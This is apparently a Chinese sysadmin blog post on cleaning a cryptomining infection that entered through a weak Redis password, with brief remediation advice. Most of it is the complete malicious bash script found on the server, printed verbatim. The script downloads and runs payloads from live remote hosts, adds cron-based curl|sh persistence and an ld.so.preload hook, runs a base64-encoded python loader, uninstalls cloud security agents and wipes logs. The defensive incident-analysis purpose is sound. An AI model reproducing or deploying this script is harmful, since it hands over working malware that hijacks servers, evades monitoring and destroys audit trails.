这个是笔者前些天帮助朋友处理的挖矿的程序脚本,本次没有写具体处理方式,写的处理过程的思路和方法,如果你有好的方法可以一起分享学习,Thankyou!
1.服务器怎么会中挖矿木马程序
肉鸡 弱口令 webshell xss 软件漏洞bug redis zk mysql 0day等造成服务器被扫描并且提权
2 首先遇到这样情况,我们杀掉挖矿的程序它会自己起来
没清理干净 定时任务 命令修改 开机自启动文件 历史记录
3.如何处理?
首先根据业务判定,造成业务故障,可选用HA方案切走应用服务,对服务器进行下架切断一切网络来源,进行相关处理
我一般处理方案是这样,首先通过iptables或者firewalls防火墙手段封死攻击者地址,类似与切断网络来源,接下来我们就可以进行分析和处理挖矿的原因
处理的方式 可以根据挖矿脚本进行分析 一个一个进行处理 对修改的命令和文件进行恢复和删除
对系统和web进行安全测试,对系统漏洞进行修复.
4.原因分析
Redis存在弱口令导致的此次故障问题,Redis可以通过config配置方式 修改配置目录将自己的key放在服务器上,以达到服务器提权的目的
1 #!/bin/bash 2 SHELL=/bin/sh 3 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 4 5 function kills() { 6 pkill -f sourplum 7 pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg 8 rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik 9 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius 10 rm -rf /tmp/*index_bak* 11 rm -rf /tmp/*httpd.conf* 12 rm -rf /tmp/*httpd.conf 13 rm -rf /tmp/a7b104c270 14 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 15 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 16 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 17 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 18 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 19 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 20 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 21 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 22 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 23 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 24 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 25 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9 26 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9 27 ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9 28 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 29 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 30 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 31 ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9 32 pkill -f biosetjenkins 33 pkill -f AnXqV.yam 34 pkill -f xmrigDaemon 35 pkill -f xmrigMiner 36 pkill -f xmrig 37 pkill -f Loopback 38 pkill -f apaceha 39 pkill -f cryptonight 40 pkill -f stratum 41 pkill -f mixnerdx 42 pkill -f performedl 43 pkill -f JnKihGjn 44 pkill -f irqba2anc1 45 pkill -f irqba5xnc1 46 pkill -f irqbnc1 47 pkill -f ir29xc1 48 pkill -f conns 49 pkill -f irqbalance 50 pkill -f crypto-pool 51 pkill -f minexmr 52 pkill -f XJnRj 53 pkill -f NXLAi 54 pkill -f BI5zj 55 pkill -f askdljlqw 56 pkill -f minerd 57 pkill -f minergate 58 pkill -f Guard.sh 59 pkill -f ysaydh 60 pkill -f bonns 61 pkill -f donns 62 pkill -f kxjd 63 pkill -f Duck.sh 64 pkill -f bonn.sh 65 pkill -f conn.sh 66 pkill -f kworker34 67 pkill -f kw.sh 68 pkill -f pro.sh 69 pkill -f polkitd 70 pkill -f acpid 71 pkill -f icb5o 72 pkill -f nopxi 73 pkill -f irqbalanc1 74 pkill -f minerd 75 pkill -f i586 76 pkill -f gddr 77 pkill -f mstxmr 78 pkill -f ddg.2011 79 pkill -f wnTKYg 80 pkill -f deamon 81 pkill -f disk_genius 82 pkill -f sourplum 83 pkill -f bashx 84 pkill -f bashg 85 pkill -f bashe 86 pkill -f bashf 87 pkill -f bashh 88 pkill -f XbashY 89 pkill -f libapache 90 pkill -f qW3xT.2 91 pkill -f /usr/bin/.sshd 92 pkill -f sustes 93 rm -rf /var/tmp/j* 94 rm -rf /tmp/j* 95 rm -rf /var/tmp/java 96 rm -rf /tmp/java 97 rm -rf /var/tmp/java2 98 rm -rf /tmp/java2 99 rm -rf /var/tmp/java* 100 rm -rf /tmp/java* 101 rm -rf /tmp/httpd.conf 102 rm -rf /tmp/conn 103 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache 104 rm -rf /tmp/conns 105 rm -f /tmp/irq.sh 106 rm -f /tmp/irqbalanc1 107 rm -f /tmp/irq 108 rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so 109 rm -rf /tmp/.systemd-private-* 110 netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 111 netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 112 netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 113 netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 114 netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 115 netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 116 netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 117 netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 118 netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 119 netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 120 netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 121 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 122 p=$(ps auxf|grep -v grep|grep kworkerds|wc -l) 123 if [ ${p} -eq 0 ];then 124 ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9 125 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 126 fi 127 } 128 129 function system() { 130 if [ ! -f "/bin/dns" ]; then 131 curl -fsSL https://pastebin.com/raw/KqzUfgz0 -o /bin/dns && chmod 755 /bin/dns 132 if [ ! -f "/bin/dns" ]; then 133 wget https://pastebin.com/raw/KqzUfgz0 -O /bin/dns && chmod 755 /bin/dns 134 fi 135 if [ ! -f "/etc/crontab" ]; then 136 echo -e "0 1 * * * root dns" >> /etc/crontab 137 else 138 sed -i '$d' /etc/crontab && echo -e "0 1 * * * root dns" >> /etc/crontab 139 fi 140 fi 141 } 142 143 function top() { 144 mkdir -p /usr/local/lib/ 145 if [ ! -f "/usr/local/lib/libdns.so" ]; then 146 curl -fsSL https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so 147 if [ ! -f "/usr/local/lib/libdns.so" ]; then 148 wget https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -O /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so 149 fi 150 fi 151 if [ ! -f "/etc/ld.so.preload" ]; then 152 echo /usr/local/lib/libdns.so > /etc/ld.so.preload 153 else 154 sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libdns.so >> /etc/ld.so.preload 155 fi 156 157 touch -acmr /bin/sh /etc/ld.so.preload 158 touch -acmr /bin/sh /usr/local/lib/libdns.so 159 } 160 161 function python() { 162 nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 & 163 touch /tmp/.tmpp 164 } 165 166 function echocron() { 167 echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh ##" > /etc/cron.d/root 168 echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh ##" > /etc/cron.d/apache 169 echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh ##" > /var/spool/cron/root 170 mkdir -p /var/spool/cron/crontabs 171 echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh ##" > /var/spool/cron/crontabs/root 172 mkdir -p /etc/cron.hourly 173 curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner 174 if [ ! -f "/etc/cron.hourly/oanacroner" ]; then 175 wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner 176 fi 177 mkdir -p /etc/cron.daily 178 curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner 179 if [ ! -f "/etc/cron.daily/oanacroner" ]; then 180 wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner 181 fi 182 mkdir -p /etc/cron.monthly 183 curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner 184 if [ ! -f "/etc/cron.monthly/oanacroner" ]; then 185 wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner 186 fi 187 touch -acmr /bin/sh /var/spool/cron/root 188 touch -acmr /bin/sh /var/spool/cron/crontabs/root 189 touch -acmr /bin/sh /etc/cron.d/apache 190 touch -acmr /bin/sh /etc/cron.d/root 191 touch -acmr /bin/sh /etc/cron.hourly/oanacroner 192 touch -acmr /bin/sh /etc/cron.daily/oanacroner 193 touch -acmr /bin/sh /etc/cron.monthly/oanacroner 194 } 195 196 function tables() { 197 iptables -I INPUT -p TCP --dport 6379 -j REJECT 198 iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT 199 iptables-save 200 touch /tmp/.tables 201 } 202 203 function uninstall() { 204 if ps aux | grep -i '[a]liyun'; then 205 wget http://update.aegis.aliyun.com/download/uninstall.sh 206 chmod +x uninstall.sh 207 ./uninstall.sh 208 wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh 209 chmod +x quartz_uninstall.sh 210 ./quartz_uninstall.sh 211 rm -f uninstall.sh quartz_uninstall.sh 212 pkill aliyun-service 213 rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service 214 rm -rf /usr/local/aegis*; 215 elif ps aux | grep -i '[y]unjing'; then 216 /usr/local/qcloud/stargate/admin/uninstall.sh 217 /usr/local/qcloud/YunJing/uninst.sh 218 /usr/local/qcloud/monitor/barad/admin/uninstall.sh 219 fi 220 touch /tmp/.uninstall 221 } 222 223 function downloadrun() { 224 ps=$(netstat -anp | grep 167.99.8 | wc -l) 225 if [ ${ps} -eq 0 ];then 226 if [ ! -f "/tmp/kworkerds" ]; then 227 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds 228 if [ ! -f "/tmp/kworkerds" ]; then 229 wget https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds 230 fi 231 nohup /tmp/kworkerds >/dev/null 2>&1 & 232 else 233 nohup /tmp/kworkerds >/dev/null 2>&1 & 234 fi 235 fi 236 } 237 238 function downloadrunxm() { 239 mkdir -p /var/tmp 240 chmod 1777 /var/tmp 241 pm=$(netstat -anp | grep 167.99.8 | wc -l) 242 if [ ${pm} -eq 0 ];then 243 rm -rf /var/tmp/config.json* 244 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -o /var/tmp/config.json && chmod +x /var/tmp/config.json 245 if [ ! -f "/var/tmp/config.json" ]; then 246 wget https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -O /var/tmp/config.json && chmod +x /var/tmp/config.json 247 fi 248 ARCH=$(uname -i) 249 if [ "$ARCH" == "x86_64" ]; then 250 rm -rf /var/tmp/kworkerds* 251 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds 252 if [ ! -f "/var/tmp/kworkerds" ]; then 253 wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds 254 fi 255 nohup /var/tmp/kworkerds >/dev/null 2>&1 & 256 elif [ "$ARCH" == "i386" ]; then 257 rm -rf /var/tmp/kworkerds* 258 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds 259 if [ ! -f "/var/tmp/kworkerds" ]; then 260 wget https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds 261 fi 262 nohup /var/tmp/kworkerds >/dev/null 2>&1 & 263 else 264 rm -rf /var/tmp/kworkerds* 265 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds 266 if [ ! -f "/var/tmp/kworkerds" ]; then 267 wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds 268 fi 269 nohup /var/tmp/kworkerds >/dev/null 2>&1 & 270 fi 271 fi 272 } 273 274 mkdir -p /tmp 275 chmod 1777 /tmp 276 update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/SGM25Vs3 ) 277 if [ ${update}x = "update"x ];then 278 echocron 279 else 280 if [ ! -f "/tmp/.uninstall" ]; then 281 uninstall 282 fi 283 if [ ! -f "/tmp/.tables" ]; then 284 tables 285 fi 286 if [ ! -f "/tmp/.tmpu" ]; then 287 rm -rf /tmp/.tmpp 288 python 289 fi 290 kills 291 downloadrun 292 echocron 293 system 294 top 295 sleep 10 296 port=$(netstat -anp | grep 167.99.8 | wc -l) 297 if [ ${port} -eq 0 ];then 298 downloadrunxm 299 fi 300 echo 0>/var/spool/mail/root 301 echo 0>/var/log/wtmp 302 echo 0>/var/log/secure 303 echo 0>/var/log/cron 304 curl -sk https://2no.co/11Grb 305 fi 306 #